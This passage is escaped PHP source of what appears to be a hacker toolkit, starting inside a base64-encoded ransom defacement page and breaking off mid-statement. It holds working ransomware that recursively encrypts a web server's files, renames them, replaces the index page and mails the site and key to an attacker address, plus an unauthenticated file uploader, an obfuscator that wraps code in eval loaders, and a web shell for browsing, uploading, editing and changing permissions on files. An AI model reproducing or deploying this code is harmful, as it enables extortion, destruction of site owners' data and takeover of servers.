IDEwcHggI0Y1OTcwMDsKICAgICAgICAgZm9udC1mYW1pbHk6IkJsYWNrIE9wcyBPbmUiOwogICAgICAgICB9CiAgICAgICAgIC5ibHVlZ2xvdyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMTBweCAjMEY2RkJEOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSIKICAgICAgICAgfQogICAgICAgICAud2hpdGVnbG93LC5ndyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgNXB4ICNGRkZGRkY7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIjsKICAgICAgICAgfQoKICAgICAgICAgI2hlbGxvIHsKICAgICAgICAgZm9udC1zaXplOiAyMHB4OwogICAgICAgICAtbW96LXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICAtd2Via2l0LXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICAtbXMtdHJhbnNpdGlvbjogY29sb3IgMXM7CiAgICAgICAgIC1vLXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICB0cmFuc2l0aW9uOiBjb2xvciAxLjJzOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSIKICAgICAgICAgfQogICAgICAgICAjaGVsbG86aG92ZXIgewogICAgICAgICBjb2xvcjogeWVsbG93OwogICAgICAgICAtd2Via2l0LXN0cm9rZS13aWR0aDogMTBweDsKICAgICAgICAgLXdlYmtpdC1zdHJva2UtY29sb3I6ICNGRkZGRkY7CiAgICAgICAgIC13ZWJraXQtZmlsbC1jb2xvcjogI0ZGRkZGRjsKICAgICAgICAgdGV4dC1zaGFkb3c6IDFweCAwcHggMjBweCByZWQ7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIgogICAgICAgICB9CiAgICAgICAgIC5jbjEsLmdnIHsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAxM3B4ICM1N2Y5Mjc7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIjsKICAgICAgICAgfQogICAgICAgICAuY25hLC5nbyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMTNweCAjZjk5OTFkOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSI7CiAgICAgICAgIH0KICAgICAgICAgLmdyIHsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAxM3B4IHJlZDsKICAgICAgICAgZm9udC1mYW1pbHk6IkJsYWNrIE9wcyBPbmUiOwogICAgICAgICB9CiAgICAgICAgIC5rY3dpbWcgeyAKICAgICAgICAgd2lkdGg6IDE2MHB4OwogICAgICAgICBoZWlnaHQ6IDE0MHB4OyAKICAgICAgICAgfSAKICAgICAgICAgLmNhcHMgewogICAgICAgICB0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOwogICAgICAgICBmb250LWZhbWlseTogIkNhYmluIFNrZXRjaCI7CiAgICAgICAgIH0KCiAgICAgICAgICNuZW9uZm9udAogICAgICAgICB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgNXB4IHJlZDsKICAgICAgICAgLXdlYmtpdC10cmFuc2l0aW9uOiB0ZXh0LXNoYWRvdyAycyBlYXNlLW91dDsKICAgICAgICAgLW1vei10cmFuc2l0aW9uOiB0ZXh0LXNoYWRvdyAycyBlYXNlLW91dDsKICAgICAgICAgLW8tdHJhbnNpdGlvbjogdGV4dC1zaGFkb3cgMnMgZWFzZS1vdXQ7CiAgICAgICAgIHRyYW5zaXRpb246IHRleHQtc2hhZG93IDJzIGVhc2Utb3V0OwogICAgICAgICBmb250LXNpemU6MzVweDsKICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGRlcjsKICAgICAgICAgfQogICAgICAgICAjbmVvbmZvbnQ6aG92ZXJ7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMzBweCByZWQ7CiAgICAgICAgIH0KICAgICAgICAgLm1lZ2EgewogICAgICAgICB0ZXh0LXNoYWRvdzogNHB4IDAgOHB4ICMwMDczQjk7CiAgICAgICAgIGZvbnQtd2VpZ2h0OiBib2xkZXI7CiAgICAgICAgIGZvbnQtZmFtaWx5OiAiQXJjaGl0ZWN0cyBEYXVnaHRlciI7CiAgICAgICAgIH0KICAgICAgICAgLndlYXJlIHsKICAgICAgICAgZm9udC1mYW1pbHk6ICJQZXJtYW5lbnQgTWFya2VyIjsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAzcHggcmVkOwogICAgICAgICBmb250LXNpemU6IDEuM2VtOwogICAgICAgICB9CiAgICAgICAgIC50aHVtYiB7CiAgICAgICAgIHdpZHRoOiAxNTBweDsgCiAgICAgICAgIGhlaWdodDogMTkwcHg7IAogICAgICAgICBtYXJnaW46IDcwcHggYXV0bzsKICAgICAgICAgcGVyc3BlY3RpdmU6IDEwMDBweDsKICAgICAgICAgfQogICAgICAgICAudGh1bWIgc3BhbiB7CiAgICAgICAgIGRpc3BsYXk6IGJsb2NrOyB3aWR0aDogMTAwJTsgaGVpZ2h0OiAxMDAlOwogICAgICAgICBiYWNrZ3JvdW5kOiAKICAgICAgICAgbGluZWFyLWdyYWRpZW50KHJnYmEoMCwgMCwgMCwgMC40KSwgcmdiYSgwLCAwLCAwLCAwLjQpKSwgdXJsKCJodHRwOi8vczI5LnBvc3RpbWcub3JnLzdydTJxNzZqYi9rY3dfbG9nb19kZWZhY2UucG5nIik7CiAgICAgICAgIGJhY2tncm91bmQtc2l6ZTogMCwgY292ZXI7CiAgICAgICAgIHRyYW5zZm9ybS1zdHlsZTogcHJlc2VydmUtM2Q7CiAgICAgICAgIHRyYW5zaXRpb246IGFsbCAwLjVzOwogICAgICAgICB9CiAgICAgICAgIGhyIHsKCQkJIGJveC1zaGFkb3c6IDNweCAzcHggM3B4IDNweCAjODg4ODg4OwoJCQkgY29sb3I6I2ZmZjsKCQkJIG1hcmdpbi1ib3R0b206IDJweDsKCQkgfQoJCSAuZ3JlZWV0IHsKCQkJIGZvbnQtZmFtaWx5OkFsZHJpY2g7Zm9udC13ZWlnaHQ6Ym9sZDtmb250LXNpemU6MTdweDsKCQkgfSAKCQkgLmVuaGFuY2UgewoJCQkgcGFkZGluZzogMWVtIDFlbTsKCQkJIGJhY2tncm91bmQ6dXJsKCcnKTsKCQkgfQoJCSAubm9wIHsKCQkJIGJhY2tncm91bmQ6IHJnYmEoMzIsIDMyLCAzMiwgLjQpOwogICAgICAgICAgICAgICAgICAgICAgICAgcGFkZGluZzogOHB4IDhweDsKCQkgfSAKCQkgLmlwa2V5IHsKCQkJIHdpZHRoOiAyMCU7CiAgICAgICAgICAgICB0cmFuc2l0aW9uOiB3aWR0aCAxczsKICAgICAgICAgICAgIC13ZWJraXQtdHJhbnNpdGlvbjogd2lkdGggMXM7CiAgICAgICAgICAgICAtbW96LXRyYW5zaXRpb246IHdpZHRoIDFzOwogICAgICAgICAgICAgaGVpZ2h0OiA0MHB4OwogICAgICAgICAgICAgZm9udC1mYW1pbHk6TW9udHNlcnJhdDtmb250LXdlaWdodDpib2xkO2ZvbnQtc2l6ZToyNXB4OwoJCSB9CgkJIC5pcGtleTpob3ZlciB7CgkJCSB3aWR0aDogMzAlOwoJCSB9CgkJIC5pcHR4dCB7CgkJCSB3aWR0aDogNTAlOwoJCQkgaGVpZ2h0OiA0MHB4OwoJCQkgZm9udC1mYW1pbHk6TW9udHNlcnJhdDtmb250LXdlaWdodDpib2xkO2ZvbnQtc2l6ZToxNXB4OwoJCSB9CgkJIC5idXR0b24gewoJCQkgYmFja2dyb3VuZDogIzY2NjsKCQkJIGJvcmRlcjogMXB4IHNvbGlkICNmZmY7CgkJCSBoZWlnaHQ6IDQwcHg7CgkJCSBmb250LXNpemU6IDIwcHg7CgkJCSBib3JkZXItcmFkaXVzOiA1cHggNXB4IDVweCA1cHg7CgkJCSB0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOwoJCQkgY29sb3I6ICNmZmY7CgkJIH0KCQkgLmJ1dHRvbjpob3ZlciB7CgkJCSBiYWNrZ3JvdW5kOiAjMDAwOwoJCSB9CiAgICAgIDwvc3R5bGU+CiAgIDwvaGVhZD4KICAgCiAgIDxib2R5PgogICAgICA8ZW1iZWQgc3JjPSJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vcy9tbnc5MXFhb2I1MG96dmwvd2UlMjBhcmUlMjBhbm9ueW1vdXMubXAzP2RsPTAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIC8+CiAgICAgIDxjZW50ZXI+CgkJICAKICAgICAgICAgPCEtLSB3aG8gd2UgYXJlPyAtLT4KICAgICAgICAgPGRpdiBpZD0iaGVhZGVyIj4KCQkgICA8c3BhbiBjbGFzcz0iZ2xvdyIgc3R5bGU9ImZvbnQtc2l6ZTogMzBwdDsiPuKAqjxpIGNsYXNzPSJmYSBmYS1oYW5kLW8tcmlnaHQiIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+IEJMQUNLIFBIQU5UT00gQ1lCRVIgPGkgY2xhc3M9ImZhIGZhLWhhbmQtby1sZWZ0IiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPjwvc3Bhbj48YnIvPgoJCSAgIAkJICAKICAgICAgICAgICA8ZGl2IGNsYXNzPSJhbmltYXRlZCBmbGlwIj48c3BhbiBjbGFzcz0iYmx1ZWdsb3cgY2FwcyI+PGZvbnQgc2l6ZT0iNSI+PGkgY2xhc3M9ImZhIGZhLXJhdmVscnkiIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+IFlPVVIgU0lURSBJUyBJTkZFQ1RFRCBCWSBSQU5TT01XQVJFIDxpIGNsYXNzPSJmYSBmYS1yYXZlbHJ5IiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPjwvZm9udD48L3NwYW4+PC9kaXY+CiAgICAgICAgIDwvZGl2PgogICAgICAgICA8IS0tIEJQQyBMb2dvIC0tPiAKICAgICAgICAgPGRpdiBjbGFzcz0idGh1bWIga2N3aW1nIj4KICAgICAgICAgICAgPHNwYW4+PC9zcGFuPgogICAgICAgICA8L2Rpdj4KICAgICAgCiAgICAgICAgIDwhLS1lbmNyeXB0IG1zZyAtLT4KICAgICAgICAgPGRpdiBjbGFzcz0iYW5pbWF0ZWQgaW5maW5pdGUgZmxhc2giPjxzcGFuIGNsYXNzPSJnciIgc3R5bGU9J2NvbG9yOmJsYWNrOyBmb250LWZhbWlseTogIkx1Y2tpZXN0IEd1eSInPjxmb250IHNpemU9IjUiPjxpIGNsYXNzPSJmYSBmYS1sb2NrIiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPiBZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgPGkgY2xhc3M9ImZhIGZhLWxvY2siIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+PC9mb250Pjwvc3Bhbj48L2Rpdj4KICAgICAgICAgPGJyPgogICAgICAgICA8IS0tIGtleSAtLT4KICAgICAgICAgPGRpdiBjbGFzcz0ibm9wIj4KICAgICAgICAgPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+CiAgICAgICAgIDxwPjxpIGNsYXNzPSJmYSBmYS1oYW5kLW8tZG93biIgYXJpYS1oaWRkZW49InRydWUiPjwvaT4gRU5URVIgVEhFIEtFWSBUTyBERUNSWVBUIEZJTEVTIDxpIGNsYXNzPSJmYSBmYS11bmxvY2siIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+PC9wPgogICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9Imlwa2V5IiBuYW1lPSJpb2tleSIgLz4KICAgICAgICAgPC9mb3JtPgogICAgICAgICA8L2Rpdj4gICAgICAgICA8IS0tIEk0TSAtLT4KICAgICAgICAgPGgxIHN0eWxlPSdmb250LWZhbWlseTogIkNoZXJyeSBDcmVhbSBTb2RhIjsnPjxiPuKclzxzcGFuIGNsYXNzPSJtZWdhIj41SDMxMV8xTkozQzcwNjwvc3Bhbj7inJc8L2I+PC9oMT4KICAgICAgICAgPGJyPgogICAgICAgICA8YnI+CiAgICAgICAgIAoKICAgICAgICAgPCEtLSB3YXJuaW5nIC0tPgogICAgICAgICAgIDxkaXYgY2xhc3M9IndlYXJlIj5XZSBhcmUgTGVnaW9uLi4uIFdlIGRvIG5vdCBGb3JnaXZlLi4uIFdlIGRvIG5vdCBGb3JnZXQuLi4gPGI+PGk+RXhwZWN0IHVzPC9pPjwvYj48L2Rpdj4KICAgICAgICAgICA8YnI+CiAgIDwvYm9keT4KPC9odG1sPg=="))){\r\n echo \'<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> index.php (Default Page)<br>\';\r\n }\r\n }\r\n }\r\n public function shcpackUnstall(){\r\n\r\n if( file_exists(".htaFuck") ){\r\n if( unlink(".htaccess") && unlink("index.php") ){\r\n echo \'<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>\';\r\n echo \'<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> index.php (Default Page)<br>\';\r\n }\r\n rename(".htaFuck", ".htaccess");\r\n }\r\n\r\n }\r\n\r\n public function plus(){\r\n flush();\r\n ob_flush();\r\n }\r\n public function locate(){\r\n return getcwd();\r\n }\r\n public function shcdirs($dir,$method,$key){\r\n switch ($method) {\r\n case \'1\':\r\n deRanSomeware::shcpackInstall();\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcpackUnstall();\r\n break;\r\n }\r\n foreach(scandir($dir) as $d)\r\n {\r\n if($d!=\'.\' && $d!=\'..\')\r\n {\r\n $locate = $dir.DIRECTORY_SEPARATOR.$d;\r\n if(!is_dir($locate)){\r\n if( deRanSomeware::kecuali($locate,"ransmini.php") && deRanSomeware::kecuali($locate,".pnjg") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,"indehx.php") && deRanSomeware::kecuali($locate,".htalol") ){\r\n switch ($method) {\r\n case \'1\':\r\n deRanSomeware::shcEnCry($key,$locate);\r\n deRanSomeware::shcEnDesDirS($locate,"1");\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcDeCry($key,$locate);\r\n deRanSomeware::shcEnDesDirS($locate,"2");\r\n break;\r\n }\r\n }\r\n }else{\r\n deRanSomeware::shcdirs($locate,$method,$key);\r\n }\r\n }\r\n deRanSomeware::plus();\r\n }\r\n deRanSomeware::report($key);\r\n }\r\n\r\n public function report($key){\r\n $message.= "========= Tuyuljahat =========\\n";\r\n $message.= "Website : ".$_SERVER[\'HTTP_HOST\'];\r\n $message.= "Key : ".$key;\r\n $message.= "========= Ransomware =========\\n";\r\n $subject = "Report Ransomeware";\r\n $headers = "From: Tuyul <TuyulJahat86@gmail.com>\\r\\n";\r\n mail("TuyulJahat86@gmail.com",$subject,$message,$headers);\r\n }\r\n\r\n public function shcEnDesDirS($locate,$method){\r\n switch ($method) {\r\n case \'1\':\r\n rename($locate, $locate.".Encrypted");\r\n break;\r\n case \'2\':\r\n $locates = str_replace(".Encrypted", "", $locate);\r\n rename($locate, $locates);\r\n break;\r\n }\r\n }\r\n\r\n public function shcEnCry($key,$locate){\r\n $data = file_get_contents($locate);\r\n $iv = mcrypt_create_iv(\r\n mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),\r\n MCRYPT_DEV_URANDOM\r\n );\r\n\r\n $encrypted = base64_encode(\r\n $iv .\r\n mcrypt_encrypt(\r\n MCRYPT_RIJNDAEL_128,\r\n hash(\'sha256\', $key, true),\r\n $data,\r\n MCRYPT_MODE_CBC,\r\n $iv\r\n )\r\n );\r\n if(file_put_contents($locate, $encrypted )){\r\n echo \'<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Encrypted</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n }else{\r\n echo \'<i class="fa fa-lock" aria-hidden="true"></i> <font color="#00BCD4">Encrypted</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> \'.$locate.\' <br>\';\r\n }\r\n }\r\n\r\n public function shcDeCry($key,$locate){\r\n $data = base64_decode( file_get_contents($locate) );\r\n $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));\r\n\r\n $decrypted = rtrim(\r\n mcrypt_decrypt(\r\n MCRYPT_RIJNDAEL_128,\r\n hash(\'sha256\', $key, true),\r\n substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),\r\n MCRYPT_MODE_CBC,\r\n $iv\r\n ),\r\n "\\0"\r\n );\r\n if(file_put_contents($locate, $decrypted )){\r\n echo \'<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Decrypted</font> (<font color="#40CE08">Success</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n }else{\r\n echo \'<i class="fa fa-unlock" aria-hidden="true"></i> <font color="#FFEB3B">Decrypted</font> (<font color="red">Failed</font>) <font color="#FF9800">|</font> <font color="#2196F3">\'.$locate.\'</font> <br>\';\r\n }\r\n }\r\n\r\n\r\n\r\n public function kecuali($ext,$name){\r\n $re = "/({$name})/";\r\n preg_match($re, $ext, $matches);\r\n if($matches[1]){\r\n return false;\r\n }\r\n return true;\r\n }\r\n}\r\n\r\nif($_POST[\'submit\']){\r\nswitch ($_POST[\'method\']) {\r\n case \'1\':\r\n deRanSomeware::shcdirs(deRanSomeware::locate(),"1",$_POST[\'key\']);\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcdirs(deRanSomeware::locate(),"2",$_POST[\'key\']);\r\n break;\r\n}\r\n}else{\r\n?>\r\n<center>\r\n<div style=\'font-size;color:red;\'>\r\n\r\n<pre>\r\n@@@@@ @@@@@ \r\n@@@@@@@ @@@@@@@\r\n@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@\r\n @@@@@@@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@ \r\n @@@@@ @@@@@@@@@@@@@@@@@@@@@ @@@@@ \r\n @@@@@ @@@@@@@@@@@@@@@@@@@@@@@ @@@@@ \r\n @@ @@@@@@@@@@@@@@@@@@@@@@@@@ @@ \r\n @@@@@@@ @@@@@@ @@@@@@ \r\n @@@@@@ @@@@ @@@@@ \r\n @@@@@@ @@@@ @@@@@ \r\n @@@@@@ @@@@@@ @@@@@ \r\n @@@@@@@@@@@ @@@@@@@@@@ \r\n @@@@@@@@@@ @@@@@@@@@ \r\n @@ @@@@@@@@@@@@@@@@@ @@ \r\n @@@@ @@@@ @ @ @ @ @@@@ @@@@ \r\n @@@@@ @@@ @ @ @ @ @@@ @@@@@ \r\n @@@@@ @@@@@@@@@@@@@ @@@@@ \r\n @@@@ @@@@@@@@@@@ @@@@ \r\n @@@@@ @@@@@@@ @@@@@ \r\n @@@@@@@ @@@@@@@ \r\n @@@@@ @@@@@ \r\n\r\n -[ Contact : HackerBaloch07@gmail.com ]-\r\n</pre>\r\n<form action="" method="post" style=" text-align: center;">\r\n <label>Key : </label>\r\n <input type="text" name="key" class="inpute" placeholder="Password Key">\r\n <select name="method" class="selecte">\r\n <option value="1">Locked</option>\r\n <option value="2">Unlocked</option>\r\n </select>\r\n <input type="submit" name="submit" class="submite" value="Submit" />\r\n</form>\r\n\r\n<?php\r\n}?>\r\n<br>\r\n\r\n<hr>\r\n\r\n<br><br>\r\n<h2><font color=\'red\' face = \'iceland\' > Uploader</h2> </font>\r\n<?php\r\n $files = @$_FILES["files"];\r\n if ($files["name"] != \'\') { \r\n $fullpath = $_REQUEST["path"] . $files["name"];\r\n if (move_uploaded_file($files[\'tmp_name\'],\r\n $fullpath)) {\r\n echo "<a href=\'$fullpath\' target=\'_blank\'>Akses\r\n untuk $fullpath</a>";\r\n } \r\n }echo \'<form method=POST\r\n enctype="multipart/form-data" action=""><input\r\n type="file" name="files"><input type=submit\r\n value="Fire!"></form></body></html>\';?>\r\n <br>\r\n </center>\r\n </div>\r\n</html>\r\n\r\n<!DOCTYPE html>\r\n<html lang="en">\r\n\t<head>\r\n\t\t\r\n\t\t\r\n\t\t<style>\r\n\tbody {\r\n\t\t\t\tbackground-color: black;\r\n\t\t\t}\r\n\t\t\tbody {\r\n\t\t\t\tcolor: red;\r\n\t\t\t\tfont-size: 100%;\r\n\t\t\t\tfont-weight: bold;\r\n\t\t\t\tfont-family: Courier;\r\n\t\t\t\t\r\n\t\t\t\tbackground-color: black; \r\n\t\t\t}\r\ninput {\r\n\tcolor: red;\r\n\t\t\t\tcolor: red;\r\n\t\t\t\tfont-size: 100%;\r\n\t\t\t\tfont-weight: bold;\r\n\t\t\t\tfont-family: Courier;\r\n\t\t\t\tborder: 2px solid red;\r\n border-radius: 4px;\r\n\t\t\t\tbackground-color: black; \r\n \r\n\r\n\r\n\r\n\r\n}\r\ntextarea {\r\n\t\t\t\tcolor: red;\r\n\t\t\t\tfont-size: 100%;\r\n\t\t\t\tfont-weight: bold;\r\n\t\t\t\tfont-family: Courier;\r\n\t\t\t\tborder: 2px solid red;\r\n border-radius: 4px;\r\n\t\t\t\tbackground-color: black; \r\n\t\t\t}\r\n#content tr:hover{\r\n\t\t\t\t\t\t background-color: black;\r\n\t\t\t\t\t\t text-shadow:0px 0px 10px red;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t#content .first{\r\n\t\t\t\t\t\t background-color: black;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\ta{\r\n\t\t\t\t\t\t color: red;\r\n\t\t\t\t\t\t text-decoration: none;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t</style>\r\n\t</head>\r\n\r\n\t<body>\r\n\t\t<div class="heading">\r\n\t\t<font><center><h1>Php Obfuscator By 5H311_1NJ3C706</h1></center></font>\r\n\t\t</div>\r\n\t\t<div class="subheading">\r\n\t\t<center>\t<h3><font>paste your php code inside hit Enter done :P</font></h3></center>\r\n\t\t</div>\r\n\t\t<div class="input">\r\n\t\t\t<form action="" method="POST">\r\n\t\t\t<center>\t<textarea rows="9" cols="85" type="text" name="php" placeholder="Input Php Code Here"></textarea><br><br>\r\n\t\t\t\t</center>\r\n\t\t\t<center>\t<input type="submit" name="submit" value="Submit" /><br>\r\n\t\t\t\t</center>\r\n\t\t\t\t<?php\r\n\t\t\t\t\tif (isset($_POST[\'submit\'])) {\r\n\t\t\t\t\t$phpcode = $_POST[\'php\'];\r\n\t\t\t\t\t\tif (!empty($phpcode)) {\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t$website = "http://".$_SERVER[\'HTTP_HOST\'];\r\n\t\t\t\t\t\t\t$file_location = htmlspecialchars($_SERVER[\'REQUEST_URI\']);\r\n\t\t\t\t\t\t\t$all_in_one = $website.$file_location;\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t\r\n\r\n\t\t\t\t\t\t\t\t$obfuscate_high_level = strrev(base64_encode(gzdeflate(gzdeflate(gzdeflate(gzcompress(gzcompress($phpcode)))))));\r\n\t\t\t\t\t\t\t\t\t\techo \' <br><center><textarea rows="9" cols="85"> \r\n<?php\r\n/*\r\n\t\r\n\t\t\t\t\t\t CODE Successfully OBFUSCATED by 5H311_1NJ3C706 Obfuscator\r\n\t\t\t\t\t Strongest PHP obfuscator ;)\r\n\t\t\t\t\tDont change the variables othervise code will not work. \r\n If you are facing any problem contact me on Gmail. \r\n 5H311_1NJ3C706\r\n Or mail me Hackerbaloch07@gmail.com ;)\r\n*/\r\n$Cyber = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNENyaW1lJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC";\r\n$Crime = "\'.$obfuscate_high_level.\'";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($Cyber))));\r\nexit;\r\n?></textarea>\r\n\';\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t} \r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\r\n\t\t\t\t?>\r\n\t\t\t</center>\r\n\t\t\t</form>\r\n\t\t</div>\r\n\t\t<div class="footer">\r\n\t\t\t\r\n\t\t</div>\r\n\t</body>\r\n</html>\r\n\r\n <?php\r\nerror_reporting(0);\r\nset_time_limit(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n<link href="" rel="stylesheet" type="text/css">\r\n<title>5H311_1NJ3C706</title>\r\n<style>\r\nbody{\r\nfont-family: "Courgette", cursive;\r\n\tbackground-image: url(" ");\r\n\tcolor:red;\r\n\tbackground-attachment:fixed;\r\n\tbackground-repeat:no-repeat;\r\n\tbackground-position:center;\r\n\tbackground-color:Black;\r\n\t-webkit-background-size: 100% 100%;\r\n}\r\nh1{\r\ncolor:red;\r\n-webkit-text-stroke: 0px #5ddcfc;\r\n}\r\n#content tr:hover{\r\nbackground-color: #5ddcfc;\r\ntext-shadow:1px 1px 0px #000;\r\n}\r\n#content .first{\r\ncolor:red;\r\nbackground-color: #5ddcfc;\r\n}\r\ntable{\r\nborder: 0px #9435dd solid;\r\n}\r\na{\r\ncolor:red;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:#9435dd;\r\ntext-shadow:0px 1px 0px #000;\r\n}\r\ninput,select,textarea{\r\nfont-family: Courgette;\r\nbackground-color:black;\r\ncolor:#5ddcfc;\r\nborder: 1px red solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<link href="https://fonts.googleapis.com/css?family=Courgette" rel="stylesheet">\r\n<center>\r\n<h1>CRACKER BY 5H311_1NJ3C706 </h1></center>\r\n<table width="700" border="0" cellpadding="4" cellspacing="1"align="center">\r\n<tr><td><font color="#5ddcfc">Current Dir :</font> \';\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\necho \'</td></tr><tr><td>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<font color="#5ddcfc">Upload File Berhasil</font><br />\';\r\n}else{\r\necho \'<font color="#9435dd">Upload File Gagal</font><br/>\';\r\n}\r\n}\r\necho \'<form enctype="multipart/form-data" method="POST">\r\n<font color="#5ddcfc">File Upload :</font><input type="file" name="file" /><input type="submit" value="upload" />\r\n</form>\r\n</td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br />\';\r\necho(\' <center><textarea style="width: 700px;height: 300px;" readonly> \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</textarea></center>\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<font color="#5ddcfc">Change Permission Berhasil</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">Change Permission Gagal</font><br />\';\r\n}\r\n}\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Go" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<font color="#5ddcfc">Berhasil Mengganti Nama</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">Gagal Mengganti Nama</font><br />\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNama Baru : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Simpan" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = 